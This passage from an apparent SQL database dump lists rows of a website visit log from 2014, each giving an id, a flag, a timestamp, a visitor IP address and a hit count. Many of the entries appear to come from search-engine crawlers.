22:54:37','66.249.76.6',1),(509,2,'2014-03-07 00:58:16','108.31.18.194',1),(510,2,'2014-03-07 01:13:06','96.241.200.70',1),(511,2,'2014-03-07 02:24:08','173.79.32.40',1),(512,1,'2014-03-07 05:24:16','195.234.136.80',2),(513,2,'2014-03-07 05:24:23','195.234.136.80',2),(514,2,'2014-03-07 08:12:14','66.249.76.6',1),(515,1,'2014-03-07 12:46:06','208.115.113.86',1),(516,2,'2014-03-07 12:47:38','24.104.140.35',1),(517,2,'2014-03-07 13:26:33','24.104.140.35',2),(518,2,'2014-03-07 16:03:52','24.104.140.35',3),(519,2,'2014-03-07 17:02:27','24.104.140.50',3),(520,1,'2014-03-07 17:07:21','198.245.51.165',4),(521,2,'2014-03-07 18:49:56','24.104.140.50',1),(522,2,'2014-03-07 19:47:06','69.143.195.253',8),(523,2,'2014-03-07 20:31:28','64.134.68.45',1),(524,1,'2014-03-07 20:32:51','64.134.68.45',1),(525,2,'2014-03-07 21:43:19','173.79.43.118',1),(526,2,'2014-03-08 00:01:47','76.100.110.177',4),(527,2,'2014-03-08 01:01:10','108.34.44.89',1),(528,2,'2014-03-08 02:31:41','71.163.119.74',9),(529,1,'2014-03-08 03:17:49','69.160.179.248',2),(530,2,'2014-03-08 03:18:16','72.81.139.37',5),(531,2,'2014-03-08 04:30:09','72.81.139.37',1),(532,2,'2014-03-08 07:31:25','108.31.18.124',1),(533,1,'2014-03-08 14:01:39','72.81.249.163',1),(534,2,'2014-03-08 14:44:39','72.66.103.148',1),(535,1,'2014-03-08 15:01:54','74.107.123.236',1),(536,2,'2014-03-08 15:02:20','74.107.123.236',1),(537,1,'2014-03-08 16:43:04','173.193.219.168',1),(538,2,'2014-03-08 18:40:24','97.21.198.63',1),(539,2,'2014-03-08 20:56:24','76.21.234.7',1),(540,1,'2014-03-08 20:56:52','76.21.234.7',1),(541,2,'2014-03-08 21:18:26','108.15.31.72',1),(542,1,'2014-03-08 22:51:03','220.181.108.90',1),(543,2,'2014-03-09 00:11:57','68.33.168.41',1),(544,1,'2014-03-09 04:58:51','66.249.76.6',1),(545,1,'2014-03-09 05:25:36','66.249.76.6',1),(546,1,'2014-03-09 09:08:32','66.249.76.6',1),(547,1,'2014-03-10 05:36:57','176.9.148.197',2),(548,1,'2014-03-10 17:41:44','72.59.209.112',2),(549,1,'2014-03-11 01:20:59','66.249.64.197',1),(550,1,'2014-03-11 09:15:35','66.249.64.22',1),(551,1,'2014-03-11 12:03:58','66.249.64.192',3),(552,1,'2014-03-11 20:16:50','63.119.183.254',1),(553,1,'2014-03-12 21:22:42','94.23.233.204',1),(554,1,'2014-03-13 06:33:07','66.249.76.6',1),(555,1,'2014-03-13 21:20:07','62.210.122.209',3),(556,1,'2014-03-14 01:03:43','94.23.233.204',1),(557,1,'2014-03-16 19:21:55','70.208.164.147',1),(558,1,'2014-03-16 20:38:20','216.151.137.36',3),(559,1,'2014-03-17 07:51:41','178.255.215.67',1),(560,1,'2014-03-17 21:24:48','146.120.158.182',1),(561,1,'2014-03-17 23:46:25','74.103.28.95',2),(562,1,'2014-03-18 03:03:47','65.55.55.229',1),(563,1,'2014-03-18 05:35:05','24.126.49.244',1),(564,1,'2014-03-18 08:00:51','216.151.137.34',5),(565,1,'2014-03-18 14:18:07','216.99.184.50',1),(566,1,'2014-03-19 02:27:56','180.76.5.175',1),(567,1,'2014-03-20 10:19:43','208.115.111.70',1),(568,1,'2014-03-21 03:47:09','216.151.137.36',1),(569,1,'2014-03-21 10:51:45','66.249.66.70',1),(570,1,'2014-03-21 12:20:33','180.76.6.43',1),(571,1,'2014-03-21 16:27:41','208.43.225.84',2),(572,1,'2014-03-21 17:02:00','66.249.76.6',1),(573,1,'2014-03-21 22:55:11','216.151.137.34',1),(574,1,'2014-03-22 01:57:36','123.125.71.23',1),(575,1,'2014-03-22 03:11:36','208.43.245.245',1),(576,1,'2014-03-22 12:00:04','68.33.168.85',1),(577,1,'2014-03-22 13:20:21','66.249.74.222',1),(578,1,'2014-03-23 14:43:02','66.87.83.99',1),(579,1,'2014-03-23 19:35:34','216.151.137.36',3),(580,1,'2014-03-23 23:58:40','66.87.83.126',1),(581,1,'2014-03-24 04:40:49','5.9.112.180',2),(582,1,'2014-03-24 05:10:41','208.77.221.210',1),(583,1,'2014-03-24 14:53:42','209.124.169.240',1),(584,1,'2014-03-24 16:11:35','69.143.86.33',1),(585,1,'2014-03-25 12:30:48','180.76.6.140',2),(586,1,'2014-03-25 22:33:29','108.81.100.134',5),(587,1,'2014-03-26 07:40:49','180.76.6.232',1),(588,1,'2014-03-27 11:07:23','66.249.75.92',1),(589,1,'2014-03-27 12:44:37','157.55.34.28',1),(590,1,'2014-03-27 13:23:50','108.81.100.134',1),(591,1,'2014-03-28 19:52:26','69.162.142.27',2),(592,1,'2014-03-28 21:06:37','107.170.42.20',2),(593,1,'2014-03-30 19:16:35','62.210.142.7',1),(594,1,'2014-04-01 20:56:36','68.180.224.232',1),(595,1,'2014-04-02 20:35:21','152.130.7.3',1),(596,1,'2014-04-03 10:46:08','66.249.68.232',1),(597,1,'2014-04-03 12:48:42','66.249.68.5',1),(598,1,'2014-04-03 17:07:31','71.230.194.50',1),(599,1,'2014-04-04 04:17:32','74.103.24.160',2),(600,1,'2014-04-04 11:58:58','66.249.66.67',1),(601,1,'2014-04-04 18:03:36','217.69.133.231',1),(602,1,'2014-04-04 20:14:55','81.144.138.34',2),(603,1,'2014-04-05 18:22:54','208.115.111.70',1),(604,1,'2014-04-05 20:48:21','131.118.85.21',1),(605,1,'2014-04-07 08:59:08','173.67.15.44',1),(606,1,'2014-04-07 17:59:27','205.222.248.19',1),(607,1,'2014-04-08 00:18:28','24.126.121.40',3),(608,1,'2014-04-08 22:34:42','157.55.33.41',1),(609,1,'2014-04-09 15:00:20','69.138.185.52',1),(610,1,'2014-04-09 23:03:58','70.192.197.211',1),(611,1,'2014-04-10 02:10:10','74.103.29.169',1),(612,1,'2014-04-10 13:00:40','157.55.33.125',1),(613,1,'2014-04-10 16:49:17','50.79.1.218',1),(614,1,'2014-04-11 14:51:26','69.58.178.59',2),(615,1,'2014-04-11 17:13:08','85.17.73.171',2),(616,1,'2014-04-12 17:58:42','217.69.133.232',1),(617,1,'2014-04-13 04:04:15','66.249.74.222',1),(618,1,'2014-04-13 19:43:39','220.181.108.87',1),(619,1,'2014-04-14 08:07:04','66.87.18.68',1),(620,1,'2014-04-14 16:35:58','66.208.58.100',1),(621,1,'2014-04-14 19:19:53','66.249.79.5',1),(622,1,'2014-04-14 21:50:57','66.249.79.5',1),(623,1,'2014-04-16 01:38:29','157.55.33.251',1),(624,1,'2014-04-16 04:18:30','78.46.145.195',2),(625,1,'2014-04-17 02:43:09','98.231.129.42',1),(626,1,'2014-04-18 01:52:44','66.249.79.197',1),(627,1,'2014-04-18 17:42:16','167.102.229.10',1),(628,1,'2014-04-19 16:47:43','66.249.70.70',1),(629,1,'2014-04-21 11:20:51','123.125.71.71',1),(630,1,'2014-04-21 18:15:40','144.76.183.41',2),(631,1,'2014-04-21 21:48:32','66.249.79.232',1),(632,1,'2014-04-21 22:57:49','208.58.117.100',1),(633,1,'2014-04-22 02:29:00','208.115.111.70',1),(634,1,'2014-04-22 03:52:37','180.76.6.142',1),(635,1,'2014-04-22 11:25:15','66.249.79.232',1),(636,1,'2014-04-23 05:47:49','173.192.34.95',1),(637,1,'2014-04-24 04:11:35','208.115.113.86',1),(638,1,'2014-04-24 05:06:30','131.118.228.9',1),(639,1,'2014-04-24 08:41:10','157.55.33.22',1),(640,1,'2014-04-24 09:02:57','78.158.11.226',1),(641,1,'2014-04-24 13:33:09','162.243.78.49',2),(642,1,'2014-04-24 17:55:21','220.181.108.88',1),(643,1,'2014-04-24 19:08:29','54.198.4.208',1),(644,1,'2014-04-25 07:59:58','68.180.224.232',1),(645,1,'2014-04-26 16:57:21','8.28.16.254',2),(646,1,'2014-04-27 10:35:17','173.192.34.95',1),(647,1,'2014-04-27 21:51:10','180.76.5.150',1),(648,1,'2014-04-28 16:01:32','167.102.228.17',1),(649,1,'2014-04-28 17:36:09','66.249.79.197',2),(650,1,'2014-04-29 07:01:01','157.56.92.141',1),(651,1,'2014-04-29 09:10:33','216.151.137.36',2),(652,1,'2014-04-29 16:48:49','66.249.66.78',1),(653,1,'2014-04-29 17:40:47','180.76.5.166',1),(654,1,'2014-04-30 11:46:57','180.76.6.29',1),(655,1,'2014-05-01 11:47:30','66.249.66.89',1),(656,1,'2014-05-01 18:11:48','66.249.66.102',1),(657,1,'2014-05-01 21:42:58','123.125.71.32',1),(658,1,'2014-05-02 13:06:42','66.249.66.82',1),(659,1,'2014-05-02 23:05:35','180.76.5.153',1),(660,1,'2014-05-03 13:55:08','66.249.66.105',1),(661,1,'2014-05-03 15:31:28','76.114.164.247',3),(662,1,'2014-05-04 07:36:25','65.55.52.112',1),(663,1,'2014-05-04 09:26:12','68.180.225.103',1),(664,1,'2014-05-04 10:57:05','66.249.66.75',1),(665,1,'2014-05-05 11:19:13','93.186.197.165',3),(666,1,'2014-05-05 17:59:25','5.39.50.0',1),(667,1,'2014-05-06 02:26:37','173.66.11.48',1),(668,1,'2014-05-06 07:44:07','157.56.92.174',1),(669,1,'2014-05-07 03:32:44','69.255.162.241',1),(670,1,'2014-05-07 10:13:22','208.115.111.70',1),(671,1,'2014-05-07 13:43:43','31.148.246.13',1),(672,1,'2014-05-07 16:47:04','5.39.50.0',1),(673,1,'2014-05-07 20:47:46','66.249.79.232',1),(674,1,'2014-05-09 09:06:51','208.115.113.86',2),(675,1,'2014-05-10 01:00:35','71.179.58.123',1),(676,1,'2014-05-10 09:42:13','66.249.79.197',1),(677,1,'2014-05-10 15:20:10','66.249.79.232',1),(678,1,'2014-05-10 20:25:31','66.249.74.248',1),(679,1,'2014-05-11 09:34:10','69.58.178.59',2),(680,1,'2014-05-11 22:43:20','172.56.3.8',1),(681,1,'2014-05-12 23:20:08','96.244.133.50',2),(682,1,'2014-05-13 00:27:24','96.244.133.50',1),(683,1,'2014-05-13 21:14:33','162.244.13.23',5),(684,1,'2014-05-14 05:20:32','66.249.66.83',1),(685,1,'2014-05-14 09:26:43','66.249.66.65',1),(686,1,'2014-05-14 14:52:18','162.243.97.129',2),(687,1,'2014-05-17 02:48:01','157.55.32.95',1),(688,1,'2014-05-17 04:21:36','69.251.106.192',1),(689,1,'2014-05-17 07:12:22','54.242.133.193',1),(690,1,'2014-05-18 02:04:49','96.244.254.106',2),(691,1,'2014-05-19 01:51:29','91.121.79.180',2),(692,1,'2014-05-19 06:08:34','66.249.70.70',1),(693,1,'2014-05-19 09:04:12','66.249.70.70',1),(694,1,'2014-05-20 07:50:26','66.249.70.70',1),(695,1,'2014-05-20 12:43:25','66.249.70.70',1),(696,1,'2014-05-21 01:15:05','206.212.134.14',1),(697,1,'2014-05-21 12:30:15','66.249.79.197',1),(698,1,'2014-05-21 13:40:35','66.249.79.232',1),(699,1,'2014-05-21 23:12:18','157.55.34.183',1),(700,1,'2014-05-22 21:26:12','85.17.75.221',2),(701,1,'2014-05-23 06:29:36','69.84.207.246',4),(702,1,'2014-05-23 21:20:11','68.180.224.175',1),(703,1,'2014-05-24 05:05:14','199.21.99.70',1),(704,1,'2014-05-24 10:46:30','199.21.99.70',1),(705,1,'2014-05-25 04:48:17','180.76.6.144',1),(706,1,'2014-05-25 06:59:33','199.21.99.70',1),(707,1,'2014-05-25 14:07:47','220.181.108.100',1),(708,1,'2014-05-26 03:02:04','188.226.215.68',1),(709,1,'2014-05-26 06:31:43','157.55.33.84',1),(710,1,'2014-05-26 11:30:33','162.243.199.208',1),(711,1,'2014-05-26 15:16:29','128.199.192.119',1),(712,1,'2014-05-26 16:06:48','66.249.66.70',1),(713,1,'2014-05-26 18:56:40','66.249.66.70',1),(714,1,'2014-05-26 22:39:04','208.115.111.70',1),(715,1,'2014-05-27 16:35:21','208.115.113.86',1),(716,1,'2014-05-28 05:05:08','91.236.75.98',2),(717,1,'2014-05-28 11:47:40','220.181.108.114',1),(718,1,'2014-05-28 18:54:36','50.79.12.193',1),(719,1,'2014-05-28 19:06:14','157.55.33.124',1),(720,1,'2014-05-29 01:06:54','199.21.99.70',1),(721,1,'2014-05-29 02:04:09','199.21.99.70',1),(722,1,'2014-05-30 15:40:43','66.249.79.197',1),(723,1,'2014-05-30 19:25:38','66.249.79.197',1),(724,1,'2014-05-31 04:38:36','65.55.213.63',1),(725,1,'2014-05-31 18:33:48','178.255.215.67',1),(726,1,'2014-06-01 21:08:23','123.125.71.92',2),(727,1,'2014-06-02 06:27:15','144.76.167.214',2),(728,1,'2014-06-02 22:42:14','180.76.6.231',1),(729,1,'2014-06-03 00:04:29','162.243.193.12',2),(730,1,'2014-06-03 16:00:26','78.158.11.226',1),(731,1,'2014-06-03 20:00:50','91.236.75.98',2),(732,1,'2014-06-03 22:14:32','98.140.236.130',1),(733,1,'2014-06-03 22:14:32','98.140.236.130',1),(734,1,'2014-06-04 00:41:54','180.76.5.166',1),(735,1,'2014-06-04 12:42:53','98.140.236.130',2),(736,1,'2014-06-04 14:00:11','66.249.79.197',1),(737,1,'2014-06-05 06:06:46','192.114.71.13',2),(738,1,'2014-06-05 10:28:58','123.125.71.25',1),(739,1,'2014-06-06 05:29:29','50.16.102.96',1),(740,1,'2014-06-06 05:29:29','174.129.130.225',1),(741,1,'2014-06-06 09:38:28','91.207.7.254',1),(742,1,'2014-06-06 17:32:19','157.55.33.86',1),(743,1,'2014-06-07 00:48:37','66.249.79.197',1),(744,1,'2014-06-07 15:31:49','66.249.79.5',1),(745,1,'2014-06-07 21:30:22','157.56.92.164',1),(746,1,'2014-06-08 02:15:20','180.76.5.149',1),(747,1,'2014-06-08 16:41:22','66.249.79.5',1),(748,1,'2014-06-08 19:06:54','71.246.248.29',2),(749,1,'2014-06-08 22:41:43','66.249.79.232',2),(750,1,'2014-06-09 22:12:55','66.249.79.5',1),(751,1,'2014-06-09 23:02:28','66.249.79.232',1),(752,1,'2014-06-10 21:34:53','66.249.79.232',1),(753,1,'2014-06-11 11:09:00','69.58.178.56',2),(754,1,'2014-06-13 18:50:52','72.10.202.130',1),(755,1,'2014-06-14 03:18:03','220.181.108.92',1),(756,1,'2014-06-15 01:35:32','66.249.79.197',1),(757,1,'2014-06-15 02:46:20','157.55.36.36',1),(758,1,'2014-06-15 05:50:36','173.66.175.208',2),(759,1,'2014-06-15 06:00:39','173.66.175.208',1),(760,1,'2014-06-16 12:42:31','66.249.79.197',1),(761,1,'2014-06-16 15:22:06','37.59.55.128',2),(762,1,'2014-06-18 03:16:58','208.43.243.244',2),(763,1,'2014-06-18 19:22:06','209.124.169.240',2),(764,1,'2014-06-20 03:55:23','66.249.79.252',1),(765,1,'2014-06-20 05:48:17','123.125.71.49',1),(766,1,'2014-06-20 20:10:58','162.243.240.168',1),(767,1,'2014-06-20 22:02:56','208.115.111.70',2),(768,1,'2014-06-21 08:45:24','142.4.203.107',2),(769,1,'2014-06-21 12:38:27','123.125.71.88',1),(770,1,'2014-06-21 18:01:15','162.243.203.199',2),(771,1,'2014-06-22 04:16:57','180.76.6.158',1),(772,1,'2014-06-22 12:52:35','142.4.203.107',2),(773,1,'2014-06-22 13:50:39','68.180.224.175',1),(774,1,'2014-06-22 16:10:44','157.55.39.11',1),(775,1,'2014-06-23 02:58:44','216.164.50.89',3),(776,1,'2014-06-23 15:36:12','95.47.138.234',2),(777,1,'2014-06-23 16:06:49','66.249.79.31',1),(778,1,'2014-06-23 17:27:27','94.242.222.44',1),(779,1,'2014-06-23 20:24:28','66.249.79.252',1),(780,1,'2014-06-24 14:48:00','66.249.79.239',1),(781,1,'2014-06-24 23:29:28','66.249.79.31',1),(782,1,'2014-06-25 00:27:59','208.115.113.86',1),(783,1,'2014-06-25 07:19:00','157.55.39.234',1),(784,1,'2014-06-25 15:07:00','180.76.5.171',1),(785,1,'2014-06-26 07:03:36','208.43.251.180',1),(786,1,'2014-06-27 00:19:33','220.181.108.95',1),(787,1,'2014-06-27 03:24:09','157.55.39.182',1),(788,1,'2014-06-27 18:24:27','162.244.13.18',3),(789,1,'2014-06-27 19:26:34','66.249.79.239',1),(790,1,'2014-06-29 04:33:53','123.125.71.86',1),(791,1,'2014-06-29 08:22:37','54.244.218.149',8),(792,1,'2014-06-30 07:45:22','91.121.79.180',2),(793,1,'2014-07-02 15:12:22','66.249.79.252',1),(794,1,'2014-07-03 00:46:54','66.249.79.252',1),(795,1,'2014-07-03 12:29:33','54.81.142.120',2),(796,1,'2014-07-04 20:02:49','96.231.19.57',1),(797,1,'2014-07-05 09:35:50','192.99.147.201',1),(798,1,'2014-07-05 19:48:22','96.244.218.90',3),(799,1,'2014-07-06 02:20:02','157.55.39.25',1),(800,1,'2014-07-06 03:08:11','180.76.6.131',1),(801,1,'2014-07-06 16:13:37','174.237.7.81',1),(802,1,'2014-07-06 18:11:44','162.243.82.97',3),(803,1,'2014-07-06 21:13:06','81.144.138.34',2),(804,1,'2014-07-07 01:46:41','217.69.133.30',1),(805,1,'2014-07-08 18:26:21','208.115.111.70',1),(806,1,'2014-07-08 22:10:34','96.244.37.184',3),(807,1,'2014-07-09 16:27:14','128.220.97.249',1),(808,1,'2014-07-10 07:26:40','180.76.6.44',1),(809,1,'2014-07-10 12:56:59','208.115.113.86',1),(810,1,'2014-07-10 16:30:33','66.249.79.254',2),(811,1,'2014-07-10 20:31:19','66.249.66.70',1),(812,1,'2014-07-10 21:50:48','66.249.66.70',1),(813,1,'2014-07-11 05:33:59','54.88.212.207',1),(814,1,'2014-07-11 09:32:34','69.58.178.59',2),(815,1,'2014-07-11 20:04:54','66.249.79.30',1),(816,1,'2014-07-12 18:38:41','107.170.122.18',1),(817,1,'2014-07-12 19:03:09','207.46.13.125',1),(818,1,'2014-07-13 08:24:52','192.99.19.154',2),(819,1,'2014-07-13 14:04:08','192.99.19.154',2),(820,1,'2014-07-13 17:28:57','217.69.133.60',1),(821,1,'2014-07-13 18:45:02','207.46.13.125',1),(822,1,'2014-07-14 03:01:28','5.9.127.154',2),(823,1,'2014-07-14 19:39:35','54.197.204.22',1),(824,1,'2014-07-15 00:25:20','123.125.71.77',1),(825,1,'2014-07-15 08:14:50','100.43.85.24',1),(826,1,'2014-07-15 12:42:50','100.43.85.24',1),(827,1,'2014-07-16 01:45:21','108.3.177.33',1),(828,1,'2014-07-16 02:36:29','108.3.177.33',1),(829,1,'2014-07-16 16:17:15','100.43.85.24',1),(830,1,'2014-07-17 06:58:33','66.249.79.251',1),(831,1,'2014-07-17 14:14:19','180.76.5.20',1),(832,1,'2014-07-17 17:05:19','157.55.39.139',1),(833,1,'2014-07-17 18:10:18','220.181.108.171',1),(834,1,'2014-07-18 02:15:42','37.59.15.104',3),(835,1,'2014-07-18 11:15:02','188.143.232.211',3),(836,1,'2014-07-19 04:25:18','157.55.39.79',1),(837,1,'2014-07-20 07:16:19','123.125.71.28',1),(838,1,'2014-07-20 12:38:57','76.100.70.237',1),(839,1,'2014-07-20 13:31:16','173.192.34.95',1),(840,1,'2014-07-21 06:16:50','192.99.8.227',1),(841,1,'2014-07-22 05:50:28','66.249.79.30',1),(842,1,'2014-07-23 02:51:28','69.251.165.173',1),(843,1,'2014-07-23 08:46:10','157.55.39.67',1),(844,1,'2014-07-23 09:03:37','69.197.160.146',2),(845,1,'2014-07-24 06:01:23','162.243.212.136',2),(846,1,'2014-07-24 12:11:12','157.55.39.82',1),(847,1,'2014-07-24 13:34:45','94.242.222.44',1),(848,1,'2014-07-26 05:28:01','66.249.66.70',1),(849,1,'2014-07-26 09:07:49','66.249.66.70',1),(850,1,'2014-07-27 05:32:37','123.125.71.55',1),(851,1,'2014-07-27 13:29:47','192.99.8.227',1),(852,1,'2014-07-27 16:38:37','188.143.232.211',3),(853,1,'2014-07-28 00:24:15','180.76.5.57',1),(854,1,'2014-07-28 01:42:45','5.9.112.68',2),(855,1,'2014-07-28 07:04:51','66.249.66.70',1),(856,1,'2014-07-28 20:47:16','37.115.186.114',1),(857,1,'2014-07-28 22:25:26','208.115.111.70',2),(858,1,'2014-07-29 15:27:08','66.249.66.70',1),(859,1,'2014-07-29 17:10:01','66.249.66.70',1),(860,1,'2014-07-30 06:03:47','66.249.66.70',1),(861,1,'2014-07-30 11:29:33','207.46.13.112',2),(862,1,'2014-07-30 13:24:40','66.249.66.70',1),(863,1,'2014-07-30 18:34:19','47.17.139.219',1),(864,1,'2014-07-31 02:04:06','209.249.5.254',1),(865,1,'2014-07-31 03:06:45','220.181.108.167',1),(866,1,'2014-07-31 07:26:09','66.249.66.70',1),(867,1,'2014-07-31 10:55:16','66.249.66.70',1),(868,1,'2014-07-31 11:25:31','207.46.13.112',1),(869,1,'2014-07-31 12:32:21','66.249.66.70',1),(870,1,'2014-08-01 12:16:25','192.99.8.227',2),(871,1,'2014-08-01 13:06:46','95.47.138.252',2),(872,1,'2014-08-03 11:50:05','207.46.13.72',1),(873,1,'2014-08-04 08:43:15','66.249.79.30',1),(874,1,'2014-08-04 10:57:29','66.249.79.238',1),(875,1,'2014-08-04 14:51:38','204.90.118.3',1),(876,1,'2014-08-05 09:20:34','66.249.79.251',1),(877,1,'2014-08-05 12:26:22','66.249.79.30',1),(878,1,'2014-08-06 12:43:30','192.99.8.227',1),(879,1,'2014-08-06 13:05:32','180.76.5.195',1),(880,1,'2014-08-06 14:38:17','50.205.129.3',1),(881,1,'2014-08-06 15:29:42','66.249.79.238',1),(882,1,'2014-08-06 16:18:27','66.249.79.251',1),(883,1,'2014-08-06 17:03:59','63.87.61.76',1),(884,1,'2014-08-06 22:28:58','50.23.66.244',2),(885,1,'2014-08-07 09:00:40','207.46.13.21',1),(886,1,'2014-08-08 05:54:29','81.209.177.95',2),(887,1,'2014-08-08 22:06:14','157.55.39.43',1),(888,1,'2014-08-09 02:43:43','69.138.203.192',1),(889,1,'2014-08-09 04:24:38','68.180.225.114',1),(890,1,'2014-08-09 12:06:09','66.249.79.30',1),(891,1,'2014-08-09 23:07:41','220.181.108.115',2),(892,1,'2014-08-10 03:00:09','66.249.79.238',1),(893,1,'2014-08-10 13:52:57','68.33.140.11',1),(894,1,'2014-08-10 16:19:05','180.76.5.152',1),(895,1,'2014-08-11 03:44:43','157.55.39.42',1),(896,1,'2014-08-11 07:24:30','66.249.79.238',1),(897,1,'2014-08-11 09:28:21','69.58.178.59',2),(898,1,'2014-08-11 14:30:35','5.9.112.68',3),(899,1,'2014-08-11 22:13:48','107.170.176.156',2),(900,1,'2014-08-12 04:15:36','173.59.46.16',1),(901,1,'2014-08-12 17:28:27','198.179.4.254',1),(902,1,'2014-08-14 05:57:40','157.55.39.42',1),(903,1,'2014-08-14 16:56:15','50.200.17.100',1),(904,1,'2014-08-16 01:46:15','91.207.7.254',1),(905,1,'2014-08-16 06:14:10','108.3.146.226',2),(906,1,'2014-08-16 11:52:03','24.153.53.43',1),(907,1,'2014-08-17 00:34:36','66.249.79.160',1),(908,1,'2014-08-17 02:01:26','208.115.111.70',1),(909,1,'2014-08-17 04:07:04','66.249.79.134',1),(910,1,'2014-08-18 03:42:45','100.43.85.24',1),(911,1,'2014-08-18 06:14:30','100.43.85.24',2),(912,1,'2014-08-19 11:11:45','180.76.6.133',2),(913,1,'2014-08-20 19:05:38','64.124.9.130',2),(914,1,'2014-08-20 20:49:56','157.55.39.27',1),(915,1,'2014-08-21 03:38:47','178.150.142.129',2),(916,1,'2014-08-21 04:39:39','66.249.79.134',1),(917,1,'2014-08-21 05:49:34','66.249.79.160',1),(918,1,'2014-08-21 09:26:10','66.249.66.70',1),(919,1,'2014-08-21 16:18:25','208.115.113.86',1),(920,1,'2014-08-21 23:26:37','69.251.165.173',1),(921,1,'2014-08-22 05:41:21','66.249.79.160',1),(922,1,'2014-08-22 08:26:52','78.46.145.195',2),(923,1,'2014-08-22 09:24:13','66.249.79.134',1),(924,1,'2014-08-22 16:12:21','54.84.147.78',2),(925,1,'2014-08-22 19:36:11','167.102.228.16',1),(926,1,'2014-08-23 05:55:49','220.181.108.186',1),(927,1,'2014-08-23 23:44:44','173.59.236.243',1),(928,1,'2014-08-24 09:00:11','220.181.108.101',1),(929,1,'2014-08-24 10:27:51','78.158.11.226',1),(930,1,'2014-08-24 13:04:35','192.99.8.227',1),(931,1,'2014-08-25 11:05:21','157.55.39.21',1),(932,1,'2014-08-25 22:02:36','144.76.167.214',2),(933,1,'2014-08-26 23:00:00','157.55.39.21',1),(934,1,'2014-08-27 09:10:24','66.249.79.160',1),(935,1,'2014-08-27 14:05:27','204.11.5.125',1),(936,1,'2014-08-27 17:46:12','198.179.4.254',2),(937,1,'2014-08-28 03:00:29','66.249.66.70',1),(938,1,'2014-08-28 07:41:52','66.249.66.70',1),(939,1,'2014-08-28 18:41:29','180.76.6.47',1),(940,1,'2014-08-29 00:15:14','144.76.178.236',2),(941,1,'2014-08-29 04:52:42','66.249.66.70',1),(942,1,'2014-08-29 09:15:40','66.249.66.70',1),(943,1,'2014-08-29 12:57:19','206.16.96.144',1),(944,1,'2014-08-29 16:13:13','192.99.8.227',1),(945,1,'2014-08-29 19:33:55','162.243.242.237',2),(946,1,'2014-08-30 09:29:41','180.76.5.22',1),(947,1,'2014-08-31 07:48:44','85.17.73.171',2),(948,1,'2014-08-31 10:18:42','69.84.207.246',4),(949,1,'2014-08-31 13:06:10','68.180.225.105',1),(950,1,'2014-09-01 23:50:51','71.126.179.105',1),(951,1,'2014-09-02 04:43:10','180.76.6.149',1),(952,1,'2014-09-02 12:01:12','66.249.79.160',1),(953,1,'2014-09-03 10:55:15','66.249.69.100',1),(954,1,'2014-09-03 12:42:20','66.249.69.100',1),(955,1,'2014-09-03 16:02:30','66.249.69.132',1),(956,1,'2014-09-03 22:06:24','66.249.69.132',1),(957,1,'2014-09-04 00:45:01','37.57.231.226',3),(958,1,'2014-09-04 06:46:24','123.125.71.42',1),(959,1,'2014-09-04 08:34:34','66.249.69.100',1),(960,1,'2014-09-04 22:36:39','66.249.79.84',1),(961,1,'2014-09-04 23:08:29','108.40.31.94',1),(962,1,'2014-09-05 13:16:29','64.124.9.130',1),(963,1,'2014-09-06 19:26:55','220.181.108.97',1),(964,1,'2014-09-06 21:19:15','208.43.251.182',2),(965,1,'2014-09-06 23:00:55','73.172.0.196',2),(966,1,'2014-09-07 18:45:06','68.180.225.105',1),(967,1,'2014-09-08 14:02:01','208.115.111.70',1),(968,1,'2014-09-08 17:30:24','128.220.97.249',1),(969,1,'2014-09-08 18:00:23','180.76.5.143',1),(970,1,'2014-09-08 20:05:36','64.124.9.130',1),(971,1,'2014-09-09 19:01:40','157.55.39.21',3),(972,1,'2014-09-09 23:29:07','74.96.244.185',1),(973,1,'2014-09-10 09:18:47','144.76.183.41',2),(974,1,'2014-09-10 16:16:54','84.43.133.162',1),(975,1,'2014-09-11 02:02:55','66.87.81.102',1),(976,1,'2014-09-11 04:45:19','208.115.113.86',1),(977,1,'2014-09-11 09:47:17','69.58.178.58',2),(978,1,'2014-09-11 16:51:53','37.57.231.226',3),(979,1,'2014-09-11 17:15:15','66.249.79.86',1),(980,1,'2014-09-12 14:21:06','54.82.35.85',1),(981,1,'2014-09-13 19:47:42','66.249.79.84',1),(982,1,'2014-09-13 22:45:58','66.249.79.92',1),(983,1,'2014-09-14 02:45:16','123.125.71.35',1),(984,1,'2014-09-14 04:22:28','66.249.79.100',1),(985,1,'2014-09-14 07:24:34','180.76.6.49',1),(986,1,'2014-09-14 09:49:21','66.249.79.84',1),(987,1,'2014-09-14 14:38:30','66.249.79.92',1),(988,1,'2014-09-14 17:33:01','66.249.79.100',1),(989,1,'2014-09-14 18:13:35','173.79.155.195',1),(990,1,'2014-09-14 19:20:40','66.249.79.100',1),(991,1,'2014-09-15 08:20:49','66.249.79.100',1),(992,1,'2014-09-15 12:02:55','66.249.79.84',1),(993,1,'2014-09-15 15:42:41','66.249.79.92',1),(994,1,'2014-09-15 18:22:16','192.99.149.88',6),(995,1,'2014-09-15 21:17:05','220.181.108.85',1),(996,1,'2014-09-16 06:57:05','66.249.69.116',1),(997,1,'2014-09-16 16:12:56','70.192.193.213',1),(998,1,'2014-09-16 22:32:10','66.249.79.100',1),(999,1,'2014-09-17 02:09:59','192.99.149.88',2),(1000,1,'2014-09-17 03:40:14','66.249.79.92',1),(1001,1,'2014-09-17 08:17:59','62.210.78.209',1),(1002,1,'2014-09-17 12:55:49','107.170.191.153',2),(1003,1,'2014-09-17 23:12:25','73.172.0.196',2),(1004,1,'2014-09-18 03:17:53','192.99.149.88',3),(1005,1,'2014-09-18 04:40:49','66.249.79.100',1),(1006,1,'2014-09-18 07:30:15','54.165.223.235',1),(1007,1,'2014-09-18 08:42:10','66.249.79.100',1),(1008,1,'2014-09-18 12:18:05','66.249.79.92',1),(1009,1,'2014-09-18 13:37:26','192.99.149.88',2),(1010,1,'2014-09-18 15:32:56','54.165.159.186',1),(1011,1,'2014-09-18 18:15:26','162.244.13.104',1),(1012,1,'2014-09-18 22:13:45','180.76.5.78',1),(1013,1,'2014-09-19 14:53:13','173.66.126.244',1),(1014,1,'2014-09-19 15:45:17','192.241.156.75',2),(1015,1,'2014-09-20 05:56:58','157.55.39.35',1),(1016,1,'2014-09-20 09:48:10','207.106.190.66',2),(1017,1,'2014-09-21 06:31:30','180.76.5.192',1),(1018,1,'2014-09-21 11:39:45','66.249.79.84',1),(1019,1,'2014-09-21 12:12:59','123.125.71.80',1),(1020,1,'2014-09-21 17:51:22','66.249.79.100',1),(1021,1,'2014-09-21 19:45:38','66.249.79.92',1),(1022,1,'2014-09-22 13:05:45','192.99.149.88',2),(1023,1,'2014-09-22 19:06:57','170.57.140.22',1),(1024,1,'2014-09-22 